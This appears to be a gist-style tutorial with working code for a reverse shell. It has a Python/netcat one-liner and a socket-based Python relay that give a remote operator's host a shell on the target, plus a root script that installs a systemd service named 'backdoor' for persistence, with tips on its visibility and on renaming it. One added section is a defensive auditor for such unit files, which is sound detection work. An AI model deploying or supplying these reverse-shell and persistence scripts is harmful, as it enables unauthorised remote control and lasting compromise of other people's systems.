On the target system, run the following loop (replace HOST with your server's IP or domain; nc and python3 must be on the target's PATH). The shell's stdin is wired to nc's stdout and its stdout/stderr to nc's stdin, so whatever you type on the listener runs in sh. If the connection is refused or drops, nc exits, the shell is killed, and the loop retries after one second:
while :; do python3 -c "HOST='localhost'; PORT='12012'; SHELL='sh'; import datetime; print(datetime.datetime.now(),'connecting to',HOST,PORT);import subprocess; nc_process=subprocess.Popen(['nc', HOST, str(PORT)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True); sh_process=subprocess.Popen([SHELL], stdin=nc_process.stdout, stdout=nc_process.stdin, stderr=nc_process.stdin, text=True); nc_process.wait(); sh_process.kill()"; sleep 1; done
Now, on your server, start the listener with nc -l 12012 (with traditional Linux netcat the listen syntax is nc -l -p 12012; OpenBSD nc, nmap's ncat and macOS nc accept nc -l 12012). Because the target retries every second, it does not matter whether the listener or the loop is started first. The shell is non-interactive (no prompt, no job control); type a command and press Enter.
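The same relay without netcat, as an added example that is not part of the original gist: the shell's stdin/stdout/stderr are attached directly to a socket, which removes the nc dependency mentioned later in the page. serve_shell() is one connection attempt, reconnect_loop() is the "while :; do ...; sleep 1; done" wrapper, and local_roundtrip() is an offline harness that plays the operator's listener on 127.0.0.1 so the wiring can be exercised without a second host. HOST, PORT and SHELL are assumed placeholders as on the page; the helper names are mine.

```python
"""Reverse shell relay with a plain socket instead of netcat.

Added example, not part of the original gist. It keeps the gist's wiring
(the shell's stdin/stdout/stderr are the network connection) but drops the
nc dependency. HOST, PORT and SHELL are the same assumed placeholders.
"""
import socket
import subprocess
import threading
import time
from typing import Optional


def serve_shell(host: str, port: int, shell: str = "sh", timeout: float = 5.0) -> bool:
    """Connect once and hand the connection to a shell.

    Returns False if the listener is not reachable, True after the shell
    exited (the operator typed 'exit' or the connection dropped).
    """
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return False
    sock.settimeout(None)  # the shell owns the descriptor from here on
    with sock:
        # Popen accepts any object with fileno(): the socket fd becomes
        # fd 0/1/2 of the shell, exactly what the nc pipes did in the gist.
        proc = subprocess.Popen([shell], stdin=sock, stdout=sock, stderr=sock)
        proc.wait()
    return True


def reconnect_loop(host: str, port: int, shell: str = "sh",
                   interval: float = 1.0, max_attempts: Optional[int] = None) -> int:
    """The gist's 'while :; do ...; sleep 1; done' loop, in Python.

    Returns how many attempts reached a listener (handy for tests); pass
    max_attempts=None to run forever like the gist's loop does.
    """
    connected = 0
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        if serve_shell(host, port, shell):
            connected += 1
        time.sleep(interval)
    return connected


def unused_local_port() -> int:
    """Bind-and-release an ephemeral port so a test can target a closed port."""
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()
    return port


def local_roundtrip(command: str, shell: str = "sh") -> str:
    """Offline demo: act as the operator's listener on 127.0.0.1, push one
    command plus 'exit' into the connecting shell and return what came back.
    """
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # ephemeral port, no real server needed
    listener.listen(1)
    port = listener.getsockname()[1]

    client = threading.Thread(target=serve_shell, args=("127.0.0.1", port, shell))
    client.start()
    conn, _ = listener.accept()
    with conn, listener:
        conn.settimeout(10)
        conn.sendall((command + "\nexit\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:  # shell exited, the target side closed the socket
                break
            chunks.append(data)
    client.join()
    return b"".join(chunks).decode()


if __name__ == "__main__":
    # For real use, replace with the operator's HOST/PORT:
    # reconnect_loop("HOST", 12012)
    print(local_roundtrip("id; uname -s"), end="")
```

Running the file prints the output of `id; uname -s` obtained through a loopback reverse shell; stderr arrives on the same socket as stdout, as in the gist, because both are the same descriptor.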
Create a Linux systemd service. Replace the HOST value in the script below with your server's IP or domain and paste it into a root shell on the target system: it writes to /root and /etc/systemd/system, so it needs root, and it is Linux-only because macOS has no systemd. The service runs the same Python/nc relay as the one-liner, but systemd restarts it on failure and enables it at boot.
HOST="localhost"
PORT="12012"
service_name=backdoor
runner="/root/.$service_name.sh"
# Write the runner script. The heredoc delimiter is unquoted on purpose so
# $HOST and $PORT are expanded now; everything else is copied literally.
cat <<EOF > "$runner"
#!/bin/sh
while :
do
python3 -c "HOST='$HOST'; PORT='$PORT'; SHELL='sh'; import datetime; print(datetime.datetime.now(),'connecting to',HOST,PORT);import subprocess; nc_process=subprocess.Popen(['nc', HOST, str(PORT)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True); sh_process=subprocess.Popen([SHELL], stdin=nc_process.stdout, stdout=nc_process.stdin, stderr=nc_process.stdin, text=True); nc_process.wait(); sh_process.kill()"
sleep 5
done
EOF
chmod +x "$runner"
# Unit file: Restart=always relaunches the runner if it ever exits, and the
# [Install] section makes "systemctl enable" start it at boot.
cat <<EOF > /etc/systemd/system/$service_name.service
[Unit]
Description=$service_name
After=network.target
[Service]
Type=simple
ExecStart=/bin/sh $runner
Restart=always
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
chmod 644 /etc/systemd/system/$service_name.service
systemctl daemon-reload
systemctl enable $service_name.service
systemctl restart $service_name.service
Now, on your server, connect to the reverse shell with nc -l 12012 (nc -l -p 12012 for traditional Linux netcat). Note: run the listener on your server, not on the target. Be aware of how visible this setup is: the "connecting to" line printed by the runner goes to the journal every 5 seconds (journalctl -u backdoor), the unit shows up in systemctl list-unit-files --state=enabled, and the script lives as a hidden file under /root. Rename the service and runner if that matters for your engagement. To remove it: systemctl disable --now backdoor.service, delete the unit file and the runner, then systemctl daemon-reload.
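From the defender's side, the persistence above leaves a recognisable shape in /etc/systemd/system: a unit with Restart=always whose ExecStart runs a hidden file from a user-writable location. The following is an added example, not part of the original gist, that audits a directory of unit files for that shape. The directory list in SUSPICIOUS_DIRS and the two sample units are constructed fixtures for this example; on a live host call audit_directory("/etc/systemd/system") instead.

```python
"""Audit systemd unit files for the shape of persistence the gist installs.

Added example, not part of the original gist: a defender-side check. The
suspicious-path list and the sample units are assumptions/constructed
fixtures for this example, not anything taken from a real host.
"""
import os
import re
import tempfile
from typing import Dict, List

# Locations a packaged service rarely executes from. Assumption for this
# example; tune it to the estate you are auditing.
SUSPICIOUS_DIRS = ("/root/", "/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
HIDDEN_PATH = re.compile(r"(^|/)\.[^/\s]+")  # a dot-file or dot-dir component


def parse_unit(text: str) -> Dict[str, str]:
    """Minimal INI-style parse of a unit file: sections ignored, last value wins."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";", "[")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def audit_unit(text: str) -> List[str]:
    """Return the reasons a unit looks like the gist's backdoor (empty list = clean)."""
    fields = parse_unit(text)
    exec_start = fields.get("ExecStart", "")
    reasons: List[str] = []
    # ExecStart may be 'sh /path/script' or 'python3 -c ...'; inspect every token.
    for token in exec_start.split():
        if HIDDEN_PATH.search(token):
            reasons.append(f"ExecStart runs a hidden path: {token}")
        elif token.startswith(SUSPICIOUS_DIRS):
            reasons.append(f"ExecStart runs from a user-writable dir: {token}")
    # Restart on its own is normal; it only matters once ExecStart is suspicious.
    if fields.get("Restart") in ("always", "on-failure") and reasons:
        reasons.append(f"Restart={fields['Restart']} keeps it alive")
    return reasons


def audit_directory(unit_dir: str) -> Dict[str, List[str]]:
    """Map unit filename -> reasons for every flagged *.service in unit_dir."""
    findings: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(unit_dir)):
        if not name.endswith(".service"):
            continue
        path = os.path.join(unit_dir, name)
        with open(path, encoding="utf-8", errors="replace") as fh:
            reasons = audit_unit(fh.read())
        if reasons:
            findings[name] = reasons
    return findings


# Constructed fixtures: one unit shaped like the gist's, one ordinary daemon.
SAMPLE_UNITS = {
    "backdoor.service": "[Unit]\nDescription=backdoor\nAfter=network.target\n"
                        "[Service]\nType=simple\nExecStart=/bin/sh /root/.backdoor.sh\n"
                        "Restart=always\nRestartSec=10\n[Install]\nWantedBy=multi-user.target\n",
    "ssh.service": "[Unit]\nDescription=OpenBSD Secure Shell server\n"
                   "[Service]\nExecStart=/usr/sbin/sshd -D $SSHD_OPTS\nRestart=on-failure\n"
                   "[Install]\nWantedBy=multi-user.target\n",
}


def audit_samples() -> Dict[str, List[str]]:
    """Write the fixtures to a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in SAMPLE_UNITS.items():
            with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_directory(d)


if __name__ == "__main__":
    # On a live host: audit_directory("/etc/systemd/system")
    for unit, reasons in audit_samples().items():
        print(unit)
        for reason in reasons:
            print("  -", reason)
```

Only backdoor.service is reported: its ExecStart runs /root/.backdoor.sh, a hidden file under /root, and Restart=always keeps it alive; ssh.service is left alone even though it also has a Restart= line, because its binary lives in /usr/sbin. Pair the file audit with journalctl, since the gist's runner logs a "connecting to" line every few seconds.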
This Gist presents two methods to establish a reverse shell using Python and Netcat (nc). The first method is a one-liner for quick execution on a Linux or macOS target. The second method wraps the same relay in a systemd service for persistence across restarts and reboots, and therefore works only on Linux hosts with systemd and requires root. If the target system lacks Python or Netcat, install them before running the scripts. Remember to replace the HOST value with your server's IP or domain, and start the listener on your server with nc -l 12012 (nc -l -p 12012 for traditional Linux netcat). Always exercise caution and adhere to ethical considerations when implementing these techniques.